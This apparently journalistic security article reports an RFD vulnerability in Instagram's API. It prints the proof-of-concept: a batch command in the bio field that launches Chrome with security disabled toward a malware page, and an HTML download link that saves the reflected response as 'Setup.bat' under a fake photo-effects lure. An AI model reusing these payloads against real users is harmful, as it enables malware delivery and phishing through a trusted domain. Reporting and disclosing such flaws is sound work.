Instagram RFD Vulnerability could be exploited to serve Malware

An independently working group of Portuguese Security researchers called WebSegura, has released a Proof-of-concept showing how Instagram can be exploited to spread Malware to the Instagram users. David Sopas, one of the researcher from the group, have found a RFD (Reflected Filename Download) Vulnerability in Instagram API which can lead to serious damage. This bug is present in the Instagram API and by simply entering batch commands to create reflected filename download link, a series of attacks can be carried out, directly blaming Instagram computers for the attack.

Technical Details

David Sopas first created a new account from which a token is to be generated and used for the vulnerability exploitation. Next he inserted the batch commands into the user Bio field, mentioning more of the similar fields can be exploited as well. This is step is done with all the privacy and security protection measures being off inside the Chrome browser.

||start chrome websegura.net/malware.htm –disable-web-security –disable-popup-blocking||

Now on visiting the Instagram JSON file from this new user, we will see the following:

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

After the first phase of reflected part is done, now the filename section is targeted.

Due to filename restrictions on the Instagram path we need to use HTML5 attribute to do this. Due to this situation “only” the following browsers are supported:

• Chrome
• Opera
• Android Browser
• Chrome for Android
• Firefox [forcing the user to “Save Link As”]

A user can replicate this by having this HTML code:

<a href="https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a" download="Setup.bat" onclick="return false;">Install Instagram new Photo Effects</a>

Ultimately, this will work for the attacker, showing the download link to every user to be hosted on Instagram.com [a trusted domain] gaining credibility from the victim.

Affect of Instagram RFD vulnerability:

1. Malicious user posts a new message to all his Instagram friends linking to a specially crafted page
2. Victims clicks on the link and checks that the file is store on Instagram servers and runs it
3. Victim has been infected with malware

A PoC video released by David Sopas can be found below, showing the whole concept step-by-step.

David reported this vulnerability to Facebook alongwith the patch on 15th of March 2015, but was rejected to be considered as a vulnerability. So this is still an open vulnerability.

David says, these types of vulnerabilities needs to be getting considered seriously by the companies as it may certainly lead to serious damage any way or the other.

This can be related to Google Drive Phishing campaign, where the original Google Drive link was being used. Similarly, Instagram RFD Vulnerability can prove to be huge success for a phishing campaign where the malicious link for the could be directly from Instagram, increasing the credibility for the victim to click the link without any suspicion and may even provide the credentials very easily seeing HTTPS being used in the link. Also, the very recent Cryptolocker/Ransomware Attacks by the cybercriminals can also get a major boost by this vulnerability, providing download link for the malware directly hosted on Instagram servers, again making no doubt in users’ mind before downloading the malicious file.